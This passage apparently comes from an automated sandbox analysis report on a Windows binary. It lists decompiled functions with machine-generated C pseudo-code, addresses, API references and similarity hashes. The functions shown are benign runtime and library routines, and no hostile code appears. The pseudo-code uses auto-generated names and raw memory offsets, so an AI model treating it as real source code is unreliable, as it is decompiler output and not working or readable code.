				 *((intOrPtr*)(_t31 +  *((intOrPtr*)( *_t31 + 4)))) = 0xe92c34;
				 *((intOrPtr*)( *((intOrPtr*)( *_t31 + 4)) + _t31 - 4)) =  *((intOrPtr*)( *_t31 + 4)) - 0x18;
				 *((intOrPtr*)(_t31 + 8)) = 0;
				 *((intOrPtr*)(_t31 + 0xc)) = 0;
				E00CA98C0( *((intOrPtr*)( *_t31 + 4)) + _t31,  *((intOrPtr*)( *_t31 + 4)) + _t31,  *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc))); // executed
				0xe2149e();
				return _t31;
			}

0x00ca3af2
0x00ca3af7
0x00ca3af9
0x00ca3afe
0x00ca3b04
0x00ca3b06
0x00ca3b0c
0x00ca3b13
0x00ca3b16
0x00ca3b16
0x00ca3b28
0x00ca3b37
0x00ca3b3d
0x00ca3b40
0x00ca3b48
0x00ca3b4f
0x00ca3b54

APIs

__EH_prolog3.LIBCMT ref: 00CA3AF2

Strings

,,, xrefs: 00CA3B0C

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3
String ID: ,,
API String ID: 431132790-1556401989
Opcode ID: 0939da464afea9685f1c9e5a650963c9914a901a64e4ccd7d48f62ebb716e3c2
Instruction ID: ab3ba55ef3ba5d1305bc0dba24b9585e5c35694ea8519b70f818c826c943026a
Opcode Fuzzy Hash: 0939da464afea9685f1c9e5a650963c9914a901a64e4ccd7d48f62ebb716e3c2
Instruction Fuzzy Hash: 0C01E474A006199FCF29DF19C54195EFBF0BF98304B10C85DE598AB311D771AA41DF80

Uniqueness

Uniqueness Score: -1.00%

Function 00E6D42E Relevance: 3.0, APIs: 2, Instructions: 16threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E71C59: std::bad_exception::bad_exception.LIBCMT ref: 00E71C90
Part of subcall function 00E71C59: __CxxThrowException@8.LIBCMT ref: 00E71C9E

Concurrency::details::SchedulerBase::CheckStaticConstruction.LIBCMT ref: 00E6D439

Part of subcall function 00E6D159: __EH_prolog3.LIBCMT ref: 00E6D160
Part of subcall function 00E6D159: Concurrency::details::_NonReentrantLock::_Acquire.LIBCMT ref: 00E6D16D

Concurrency::details::ThreadScheduler::Create.LIBCMT ref: 00E6D441

Part of subcall function 00E783B7: __EH_prolog3.LIBCMT ref: 00E783BE
Part of subcall function 00E783B7: Concurrency::details::ThreadScheduler::ThreadScheduler.LIBCMT ref: 00E783DF

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::details::Thread$H_prolog3SchedulerScheduler::$AcquireBase::CheckConcurrency::details::_ConstructionCreateException@8Lock::_ReentrantStaticThrowstd::bad_exception::bad_exception
String ID:
API String ID: 3422515427-0
Opcode ID: dfe32384f9c00a5c2d26e5e4fec08fe1b23162d87cf6d89f407b317d9ae857ca
Instruction ID: d67b6805dddca421bde49f556b2a4b06a855074e8fd908476ba5de192b8cec75
Opcode Fuzzy Hash: dfe32384f9c00a5c2d26e5e4fec08fe1b23162d87cf6d89f407b317d9ae857ca
Instruction Fuzzy Hash: 40C012766D420D168F047AA9FC1262937CC8A5079874850A1F80CA5653DE25EC50D091

Uniqueness

Uniqueness Score: -1.00%

Function 00D32364 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00D32364(intOrPtr* __ecx) {
				intOrPtr _t84;
				void* _t93;
				struct tagLOGFONTW _t95;

				0xe214d0(4);
				 *((intOrPtr*)(_t93 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				 *((intOrPtr*)(__ecx + 0x98)) = 0xea00e4;
				 *((intOrPtr*)(_t93 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0xa4)) = 0;
				 *((intOrPtr*)(__ecx + 0xa0)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xac)) = 0;
				 *((intOrPtr*)(__ecx + 0xa8)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xb4)) = 0;
				 *((intOrPtr*)(__ecx + 0xb0)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xbc)) = 0;
				 *((intOrPtr*)(__ecx + 0xb8)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xc4)) = 0;
				 *((intOrPtr*)(__ecx + 0xc0)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				 *((intOrPtr*)(__ecx + 0xc8)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xd4)) = 0;
				 *((intOrPtr*)(__ecx + 0xd0)) = 0xea00e4;
				 *((intOrPtr*)(__ecx + 0xdc)) = 0;
				 *((intOrPtr*)(__ecx + 0xd8)) = 0xea00d4;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0xea00d4;
				 *((intOrPtr*)(__ecx + 0xec)) = 0;
				 *((intOrPtr*)(__ecx + 0xe8)) = 0xea00d4;
				 *((intOrPtr*)(__ecx + 0x114)) = 0;
				 *((intOrPtr*)(__ecx + 0x118)) = 0;
				 *((intOrPtr*)(__ecx + 0x120)) = 0;
				 *((intOrPtr*)(__ecx + 0x11c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x128)) = 0;
				 *((intOrPtr*)(__ecx + 0x124)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x130)) = 0;
				 *((intOrPtr*)(__ecx + 0x12c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x138)) = 0;
				 *((intOrPtr*)(__ecx + 0x134)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x140)) = 0;
				 *((intOrPtr*)(__ecx + 0x13c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x148)) = 0;
				 *((intOrPtr*)(__ecx + 0x144)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x150)) = 0;
				 *((intOrPtr*)(__ecx + 0x14c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x158)) = 0;
				 *((intOrPtr*)(__ecx + 0x154)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x160)) = 0;
				 *((intOrPtr*)(__ecx + 0x15c)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x168)) = 0;
				 *((intOrPtr*)(__ecx + 0x164)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x16c)) = 0;
				 *((intOrPtr*)(__ecx + 0x170)) = 0;
				 *((intOrPtr*)(__ecx + 0x174)) = 0;
				 *((intOrPtr*)(__ecx + 0x178)) = 0;
				 *((char*)(_t93 - 4)) = 0x14;
				 *__ecx = 0;
				 *((intOrPtr*)(__ecx + 0x1e4)) = 1;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *(__ecx + 0x1c4) =  *(__ecx + 0x1c4) | 0xffffffff;
				_t84 = 4;
				 *((intOrPtr*)(__ecx + 0x18c)) = 1;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *((intOrPtr*)(__ecx + 0xf8)) = 0;
				 *((intOrPtr*)(__ecx + 0xfc)) = 0;
				 *((intOrPtr*)(__ecx + 0x108)) = 0;
				 *((intOrPtr*)(__ecx + 0x10c)) = 0;
				 *((intOrPtr*)(__ecx + 0x110)) = 0;
				 *((intOrPtr*)(__ecx + 0x100)) = 0;
				 *((intOrPtr*)(__ecx + 0x104)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = 0;
				 *((intOrPtr*)(__ecx + 0x198)) = 0;
				 *((intOrPtr*)(__ecx + 0x1e8)) = 0;
				 *((intOrPtr*)(__ecx + 0x1b0)) = 0xea0394;
				 *((intOrPtr*)(__ecx + 0x1b4)) = 3;
				 *((intOrPtr*)(__ecx + 0x1b8)) = 0xe;
				 *((intOrPtr*)(__ecx + 0x1bc)) = _t84;
				 *((intOrPtr*)(__ecx + 0x1c0)) = 0x32;
				 *((intOrPtr*)(__ecx + 0x184)) = 0;
				 *((intOrPtr*)(__ecx + 0x188)) = 0;
				E00D3302F(__ecx, 0, _t95); // executed
				0xe2149e();
				return __ecx;
			}

APIs

__EH_prolog3.LIBCMT ref: 00D3236B

Part of subcall function 00D3302F: _memset.LIBCMT ref: 00D3307B
Part of subcall function 00D3302F: VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 00D33092
Part of subcall function 00D3302F: VerSetConditionMask.NTDLL(00000000), ref: 00D33096
Part of subcall function 00D3302F: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 00D330A3
Part of subcall function 00D3302F: GetSystemMetrics.USER32(00001000), ref: 00D330B4

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion_memset
String ID:
API String ID: 361283447-0
Opcode ID: 4e4cbbf0422ab8aa7aa8db4e9b0f67d4cd0b6196db22dce4bcae607e8eb647a1
Instruction ID: 38139cad7f6a191d52d33508371fe5bebf199c1470504c045546fa7cd8e101b4
Opcode Fuzzy Hash: 4e4cbbf0422ab8aa7aa8db4e9b0f67d4cd0b6196db22dce4bcae607e8eb647a1
Instruction Fuzzy Hash: 0F51CDB0906F45CFD7A9CF3A85417C6FAE0BF89300F108A2E91AED6261EB716184CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D2D7 Relevance: 1.5, APIs: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00D0D2D7(signed int __ecx, void* __esi) {
				void* _t15;
				signed int _t17;
				intOrPtr _t18;
				signed int _t21;
				signed int _t22;
				intOrPtr* _t23;
				void* _t24;
				void* _t25;
				void* _t26;

				_t24 = __esi;
				_t20 = __ecx;
				0xe214d0(4);
				_t23 = __ecx;
				if((0 |  *((intOrPtr*)(_t26 + 8)) != 0x00000000) == 0) {
					L1:
					E00D0BD09(_t20);
				}
				if( *_t23 == 0) {
					_t17 =  *0xf0b39c; // 0xf0b368
					if(_t17 != 0) {
						L5:
						_t20 = _t17; // executed
						_t18 = E00D0D10E(_t17); // executed
						 *_t23 = _t18;
						if(_t18 == 0) {
							goto L1;
						}
					} else {
						_t20 = 0xf0b368;
						 *(_t26 - 0x10) = 0xf0b368;
						 *(_t26 - 4) =  *(_t26 - 4) & _t17;
						_t17 = E00D0D024(0xf0b368, _t24);
						 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
						 *0xf0b39c = _t17;
						if(_t17 == 0) {
							goto L1;
						} else {
							goto L5;
						}
					}
				}
				_t21 =  *0xf0b39c; // 0xf0b368
				_t25 = E00D0D377(_t21,  *_t23);
				if(_t25 == 0) {
					_t15 =  *((intOrPtr*)(_t26 + 8))();
					_t22 =  *0xf0b39c; // 0xf0b368
					_t25 = _t15;
					E00D0D42E(_t22,  *_t23, _t25);
				}
				0xe2149e();
				return _t25;
			}

APIs

__EH_prolog3.LIBCMT ref: 00D0D2DE

Part of subcall function 00D0BD09: __CxxThrowException@8.LIBCMT ref: 00D0BD1D

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Exception@8H_prolog3Throw
String ID:
API String ID: 3670251406-0
Opcode ID: 68b64c3236ddb610f3492f7a9715ee466622b5b598fce836dd10a70a0add5e2d
Instruction ID: cc54c8f42f3fa3d005bd42d460148c979a2cc6bcbd3f2e06c7b1406ecf28dbd0
Opcode Fuzzy Hash: 68b64c3236ddb610f3492f7a9715ee466622b5b598fce836dd10a70a0add5e2d
Instruction Fuzzy Hash: 22012C70A00217DBDB25ABB5981276D76A2FF50360B645536E809AB2D5EF30CD10DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CA23D6 Relevance: 1.5, APIs: 1, Instructions: 30
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 27%

			E00CA23D6(intOrPtr* __ecx, char _a4, intOrPtr _a8) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t13;
				intOrPtr* _t14;

				_t13 = _a8;
				_t14 = __ecx;
				if(_a4 != 0 &&  *((intOrPtr*)(__ecx + 0x14)) >= 0x10) {
					_t9 =  *__ecx;
					if(_t13 != 0) {
						0xe219a0(__ecx, _t9, _t13);
					}
					_push(_t9); // executed
					_t7 = E00D0BCBD(_t7); // executed
				}
				 *((intOrPtr*)(_t14 + 0x10)) = _t13;
				 *((intOrPtr*)(_t14 + 0x14)) = 0xf;
				 *((char*)(_t13 + _t14)) = 0;
				return _t7;
			}

0x00ca23df
0x00ca23e2
0x00ca23e4
0x00ca23ed
0x00ca23f1
0x00ca23f6
0x00ca23fb
0x00ca23fe
0x00ca23ff
0x00ca2405
0x00ca2406
0x00ca2409
0x00ca2410
0x00ca2417

APIs

_memmove.LIBCMT ref: 00CA23F6

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 394a6f2ed580e98d925fb0ae83195fb2808cbbd027d7dfc278bba2a4a9ca270a
Instruction ID: f05ce387399312524db1ad5ae975acd072cbe5fe02ca36fcf162efd050387b87
Opcode Fuzzy Hash: 394a6f2ed580e98d925fb0ae83195fb2808cbbd027d7dfc278bba2a4a9ca270a
Instruction Fuzzy Hash: 84E0A232404B116BE3306F0DA800F03FBECEF82324F24002FE85A13202C7B5AA8882F1

Uniqueness

Uniqueness Score: -1.00%

Function 00D0BC90 Relevance: 1.5, APIs: 1, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00D0BCAC

Part of subcall function 00E26445: __FF_MSGBANNER.LIBCMT ref: 00E2645C
Part of subcall function 00E26445: __NMSG_WRITE.LIBCMT ref: 00E26463
Part of subcall function 00E26445: RtlAllocateHeap.NTDLL(00550000,00000000,00000001), ref: 00E26488

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 0ec6128ba58a948355c4a9b642cff48ded8476fe4d4b70355063a51a86cb0872
Instruction ID: 7ee48fc482a3d729148aedf5a6a21274d74365565ecbe70a30b8bc1080a8d078
Opcode Fuzzy Hash: 0ec6128ba58a948355c4a9b642cff48ded8476fe4d4b70355063a51a86cb0872
Instruction Fuzzy Hash: 7AD0173624812A67EB116AB9EC01AAA7788AA417B17080032FC08DA1D0EF61CC1057E4

Uniqueness

Uniqueness Score: -1.00%

Function 00D0D289 Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00D0D289(void* __ebx, intOrPtr* __ecx, void* __esi) {
				intOrPtr* _t13;
				void* _t15;

				_t12 = __ecx;
				0xe21539(8);
				_t13 = __ecx;
				if( *__ecx == 0) {
					E00D0F0EC(__ebx, __ecx, __esi, 0x10);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					if( *__ecx == 0) {
						 *__ecx =  *((intOrPtr*)(_t15 + 8))();
					}
					 *(_t15 - 4) =  *(_t15 - 4) | 0xffffffff;
					E00D0F161(_t12, 0x10);
				}
				0xe2149e();
				return  *_t13;
			}

0x00d0d289
0x00d0d290
0x00d0d295
0x00d0d29a
0x00d0d29e
0x00d0d2a3
0x00d0d2aa
0x00d0d2af
0x00d0d2af
0x00d0d2b1
0x00d0d2b7
0x00d0d2b7
0x00d0d2be
0x00d0d2c3

APIs

__EH_prolog3_catch.LIBCMT ref: 00D0D290

Part of subcall function 00D0F0EC: RtlEnterCriticalSection.NTDLL(00F0B598), ref: 00D0F11B
Part of subcall function 00D0F0EC: RtlInitializeCriticalSection.NTDLL(00000000), ref: 00D0F131
Part of subcall function 00D0F0EC: RtlLeaveCriticalSection.NTDLL(00F0B598), ref: 00D0F143
Part of subcall function 00D0F0EC: RtlEnterCriticalSection.NTDLL(00000000), ref: 00D0F14F

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: f7d1f8c34043b6d084ef2dc8f3cbd7cbbee0632a3f0fa23078f05c07368fcb02
Instruction ID: d08e7f8045b9c1b6c8aacf70e74909b06016f96d7843618f0b6f17a2a0909495
Opcode Fuzzy Hash: f7d1f8c34043b6d084ef2dc8f3cbd7cbbee0632a3f0fa23078f05c07368fcb02
Instruction Fuzzy Hash: BAE04F31500316EFEB607FB0C4027487760BF20721F209165E558661C1DBB089909731

Uniqueness

Uniqueness Score: -1.00%

Function 00E20C9D Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

Part of subcall function 00E29D50: __lock.LIBCMT ref: 00E29D52

__onexit_nolock.LIBCMT ref: 00E20CB9

Part of subcall function 00E20CE1: RtlDecodePointer.NTDLL ref: 00E20CF4
Part of subcall function 00E20CE1: RtlDecodePointer.NTDLL ref: 00E20CFF
Part of subcall function 00E20CE1: __realloc_crt.LIBCMT ref: 00E20D40
Part of subcall function 00E20CE1: __realloc_crt.LIBCMT ref: 00E20D54
Part of subcall function 00E20CE1: RtlEncodePointer.NTDLL(00000000), ref: 00E20D66
Part of subcall function 00E20CE1: RtlEncodePointer.NTDLL(?), ref: 00E20D74
Part of subcall function 00E20CE1: RtlEncodePointer.NTDLL(00000000), ref: 00E20D80

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Pointer$Encode$Decode__realloc_crt$__lock__onexit_nolock
String ID:
API String ID: 3536590627-0
Opcode ID: f7e079f8bee724ddd62d1ff00bb1f3d38351ef4361f0d36cd8a180225afcab35
Instruction ID: addfb3288a3f9940b2d2dff699d260d78d5979fb783b7ef50340f3b04bfa1f57
Opcode Fuzzy Hash: f7e079f8bee724ddd62d1ff00bb1f3d38351ef4361f0d36cd8a180225afcab35
Instruction Fuzzy Hash: 14D017B2D01228EBDB11BBA4E94276CB6F06F00722F506244F019B61E3CBB84A029B85

Uniqueness

Uniqueness Score: -1.00%

Function 00D32F84 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D32F84(void* __ecx, void* _a4) {
				void* _t3;
				int _t4;

				_t3 = _a4;
				if( *((intOrPtr*)(__ecx + 0x17c)) == 0) {
					 *_t3 = 0x1f4;
				}
				_t4 = SystemParametersInfoW(0x29,  *_t3, _t3, 0); // executed
				return _t4;
			}

0x00d32f8e
0x00d32f91
0x00d32f93
0x00d32f93
0x00d32fa0
0x00d32fa7

APIs

SystemParametersInfoW.USER32(00000029,?,?,00000000), ref: 00D32FA0

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: a53a8cf4ea0ad6b4d68e36e5a5cb33bef8ce5d316fecf7ca43480bc61c85d4af
Instruction ID: 646982b06f7f876751f4e1921d0904e9cf96c32871ce2d69c52bd6e960bfa629
Opcode Fuzzy Hash: a53a8cf4ea0ad6b4d68e36e5a5cb33bef8ce5d316fecf7ca43480bc61c85d4af
Instruction Fuzzy Hash: D8D012B0140204EFE7019F82DC09FB237B8EB15705F444475F6089E5A0D7B26810CFB4

Uniqueness

Uniqueness Score: -1.00%

Function 00E66675 Relevance: 1.5, APIs: 1, Instructions: 9COMMONLIBRARYCODE

Download Yara Rule

APIs

mtx_do_lock.LIBCPMT ref: 00E6667D

Part of subcall function 00E664B1: GetCurrentThreadId.KERNEL32 ref: 00E664E0
Part of subcall function 00E664B1: Concurrency::critical_section::lock.LIBCMT ref: 00E664EA
Part of subcall function 00E664B1: GetCurrentThreadId.KERNEL32 ref: 00E664EF

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CurrentThread$Concurrency::critical_section::lockmtx_do_lock
String ID:
API String ID: 3783503772-0
Opcode ID: afe7df3d28b4959e0b794dc520734ee250ff84668c96b26955b8cc05fc25ab1a
Instruction ID: 84284383fb33189baa71bbd0d7c34072664010717b191442c5328ce3e8c8a618
Opcode Fuzzy Hash: afe7df3d28b4959e0b794dc520734ee250ff84668c96b26955b8cc05fc25ab1a
Instruction Fuzzy Hash: 51B0123208C30C3AEA042541FC03B043BCCD7006B0E604016F90C191D16D537451008C

Uniqueness

Uniqueness Score: -1.00%

Function 00D1A9E6 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D1A9E6(void* __ecx) {
				int _t3;
				void* _t5;
				void* _t7;

				if( *((intOrPtr*)(__ecx + 4)) != 0) {
					_t3 = DeleteObject(E00D1AA2D(_t5, __ecx, _t7)); // executed
					return _t3;
				} else {
					return 0;
				}
			}

0x00d1a9ea
0x00d1a9f5
0x00d1a9fb
0x00d1a9ec
0x00d1a9ee
0x00d1a9ee

APIs

DeleteObject.GDI32(00000000), ref: 00D1A9F5

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
